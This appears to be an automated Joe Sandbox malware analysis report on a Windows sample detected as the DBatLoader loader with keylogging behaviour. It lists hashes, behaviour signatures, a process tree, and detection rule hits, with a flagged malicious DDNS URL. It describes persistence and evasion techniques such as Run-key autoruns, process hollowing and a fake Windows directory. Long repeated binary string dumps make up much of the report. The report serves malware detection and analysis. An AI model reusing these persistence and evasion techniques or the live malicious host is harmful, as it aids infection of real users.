Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qDKTsL1y44.exe

Overview

General Information

Sample name:qDKTsL1y44.exe
renamed because original name is a hash value
Original sample name:60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db.exe
Analysis ID:1389143
MD5:42f93ef4ac4943f328a1518bde3c333a
SHA1:7bca2b97fe0136a6787a1f08903e723a7b2a17c1
SHA256:60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db
Tags:exe
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Found Tor onion address
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • qDKTsL1y44.exe (PID: 7304 cmdline: C:\Users\user\Desktop\qDKTsL1y44.exe MD5: 42F93EF4AC4943F328A1518BDE3C333A)
    • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7560 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • veaiqniF.pif (PID: 7604 cmdline: C:\Users\Public\Libraries\veaiqniF.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Finqiaev.PIF (PID: 7860 cmdline: "C:\Users\Public\Libraries\Finqiaev.PIF" MD5: 42F93EF4AC4943F328A1518BDE3C333A)
    • veaiqniF.pif (PID: 7952 cmdline: C:\Users\Public\Libraries\veaiqniF.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Finqiaev.PIF (PID: 8020 cmdline: "C:\Users\Public\Libraries\Finqiaev.PIF" MD5: 42F93EF4AC4943F328A1518BDE3C333A)
    • veaiqniF.pif (PID: 5264 cmdline: C:\Users\Public\Libraries\veaiqniF.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      00000000.00000003.1362814847.000000007FBF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          Process Memory Space: qDKTsL1y44.exe PID: 7304JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.qDKTsL1y44.exe.41e0000.5.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\veaiqniF.pif, NewProcessName: C:\Users\Public\Libraries\veaiqniF.pif, OriginalFileName: C:\Users\Public\Libraries\veaiqniF.pif, ParentCommandLine: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentImage: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentProcessId: 7304, ParentProcessName: qDKTsL1y44.exe, ProcessCommandLine: C:\Users\Public\Libraries\veaiqniF.pif, ProcessId: 7604, ProcessName: veaiqniF.pif
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Finqiaev.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qDKTsL1y44.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Finqiaev
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 34.117.186.192, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\veaiqniF.pif, Initiated: true, ProcessId: 7604, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Finqiaev.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qDKTsL1y44.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Finqiaev
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine: C:\Users\Public\Libraries\veaiqniF.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\veaiqniF.pif, NewProcessName: C:\Users\Public\Libraries\veaiqniF.pif, OriginalFileName: C:\Users\Public\Libraries\veaiqniF.pif, ParentCommandLine: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentImage: C:\Users\user\Desktop\qDKTsL1y44.exe, ParentProcessId: 7304, ParentProcessName: qDKTsL1y44.exe, ProcessCommandLine: C:\Users\Public\Libraries\veaiqniF.pif, ProcessId: 7604, ProcessName: veaiqniF.pif
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://severdops.ddns.net:2024Avira URL Cloud: Label: malware
              Source: C:\Users\Public\Libraries\Finqiaev.PIFReversingLabs: Detection: 71%
              Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 79%
              Source: qDKTsL1y44.exeReversingLabs: Detection: 71%
              Source: C:\Users\Public\Libraries\netutils.dllJoe Sandbox ML: detected
              Source: C:\Users\Public\Libraries\Finqiaev.PIFJoe Sandbox ML: detected
              Source: qDKTsL1y44.exeJoe Sandbox ML: detected

              Compliance

              barindex
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 7.2.veaiqniF.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 10.2.veaiqniF.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\veaiqniF.pifUnpacked PE file: 12.2.veaiqniF.pif.400000.0.unpack
              Source: qDKTsL1y44.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49716 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_041E5C18

              Networking

              barindex
              Source: qDKTsL1y44.exe, 00000000.00000002.1576058150.000000007A460000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: qDKTsL1y44.exe, 00000000.00000003.1487466514.0000000079F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: veaiqniF.pif, 00000007.00000002.1736658923.0000000000D90000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: veaiqniF.pif, 00000007.00000001.1488647701.0000000000400000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: veaiqniF.pif, 00000007.00000002.1736658923.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
